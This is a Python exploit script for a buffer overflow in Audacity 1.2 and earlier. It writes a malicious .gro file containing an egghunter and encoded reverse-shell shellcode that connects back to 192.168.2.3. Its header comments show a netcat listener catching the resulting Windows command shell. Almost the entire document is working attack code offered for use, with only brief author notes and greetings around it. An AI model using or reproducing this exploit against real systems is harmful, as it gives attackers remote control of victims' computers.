#!/usr/bin/env python # # Audacity <= 1.2 .gro universal buffer overflow exploit # Author: mr_me # Download: http://audacity.sourceforge.net/download/ # Tested on Wind0ws XP sp3 & Vist@ # # Greetz fly to Muts and the offensive-security team # also to my wonderful partner Vanessa F for putting up with me :P # http://www.offensive-security.com/information-security-training.php # # Original: www.milw0rm.com/exploits/7634 ################################################# # # samurai@mrme:~$ nc -lvp 4444 # listening on [any] 4444 ... # 192.168.2.3: inverse host lookup failed: Unknown server error : # Connection timed out # connect to [192.168.2.3] from (UNKNOWN) [192.168.2.3] 55164 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\Program Files\Audacity> print " [+] Creating eviL .gro file..." buff = ("\x44" * 174) buff += ("\xEB\x08\x90\x90") buff += ("\x22\x23\x17\x01") buff += "\x90"* 4 buff += ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "\x57\x30\x30\x54" # this is the egg... "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") buff += ("\xCC" * 1000); buff += "W00TW00T" # Reverse shellcode to 192.168.2.3 change as you see fit (2000 bytes for space) buff += ("\x89\xe5\xd9\xc3\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" "\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b" "\x4f\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x46\x44\x47\x54\x4c\x4b" "\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x44\x38\x45\x51\x4a" "\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51" "\x4a\x4b\x50\x49\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x50" "\x31\x49\x50\x4d\x49\x4e\x4c\x4d\x54\x49\x50\x44\x34\x44\x47" "\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47" "\x4b\x50\x54\x47\x54\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f" "\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c" "\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x45\x53\x46\x4c\x4c\x4b" "\x4d\x59\x42\x4c\x51\x34\x45\x4c\x45\x31\x49\x53\x46\x51\x49" "\x4b\x45\x34\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x51\x50\x44\x4c" "\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51" "\x4e\x42\x48\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f" "\x4e\x36\x43\x56\x50\x53\x45\x36\x42\x48\x46\x53\x50\x32\x45" "\x38\x43\x47\x44\x33\x46\x52\x51\x4f\x51\x44\x4b\x4f\x48\x50" "\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x4e" "\x36\x51\x4f\x4c\x49\x4a\x45\x45\x36\x4b\x31\x4a\x4d\x44\x48" "\x45\x52\x46\x35\x42\x4a\x44\x42\x4b\x4f\x48\x50\x45\x38\x4e" "\x39\x45\x59\x4c\x35\x4e\x4d\x51\x47\x4b\x4f\x49\x46\x46\x33" "\x51\x43\x51\x43\x51\x43\x50\x43\x51\x43\x47\x33\x51\x43\x4b" "\x4f\x4e\x30\x42\x48\x49\x50\x49\x38\x45\x52\x45\x53\x42\x46" "\x42\x48\x44\x51\x51\x4c\x43\x56\x50\x53\x4b\x39\x4d\x31\x4d" "\x45\x43\x58\x4a\x4c\x4c\x39\x4e\x4a\x43\x50\x51\x47\x4b\x4f" "\x4e\x36\x42\x4a\x42\x30\x46\x31\x46\x35\x4b\x4f\x48\x50\x42" "\x46\x43\x5a\x42\x44\x43\x56\x42\x48\x45\x33\x42\x4d\x42\x4a" "\x46\x30\x50\x59\x46\x49\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x47" "\x34\x4d\x59\x4b\x52\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4a\x35" "\x4d\x59\x4b\x4d\x4b\x4e\x50\x42\x46\x4d\x4b\x4e\x50\x42\x46" "\x4c\x4c\x4d\x42\x5a\x47\x48\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38" "\x42\x52\x4b\x4e\x48\x33\x42\x36\x4b\x4f\x42\x55\x47\x58\x4b" "\x4f\x49\x46\x51\x4b\x51\x47\x51\x42\x46\x31\x50\x51\x46\x31" "\x42\x4a\x43\x31\x50\x51\x50\x51\x51\x45\x50\x51\x4b\x4f\x4e" "\x30\x42\x48\x4e\x4d\x4e\x39\x43\x35\x48\x4e\x51\x43\x4b\x4f" "\x48\x56\x42\x4a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x4e\x30\x42" "\x48\x4d\x37\x43\x49\x48\x46\x43\x49\x4b\x4f\x42\x55\x44\x44" "\x4b\x4f\x49\x46\x4b\x4f\x43\x47\x4b\x4c\x4b\x4f\x4e\x30\x43" "\x58\x4a\x50\x4c\x4a\x45\x54\x51\x4f\x50\x53\x4b\x4f\x4e\x36" "\x4b\x4f\x48\x50\x44\x4a\x41\x41") file = open('mr_mes_eviL.gro','w'); file.write(buff); file.close(); print " [+] mr_mes_eviL.gro File created successfully. :)"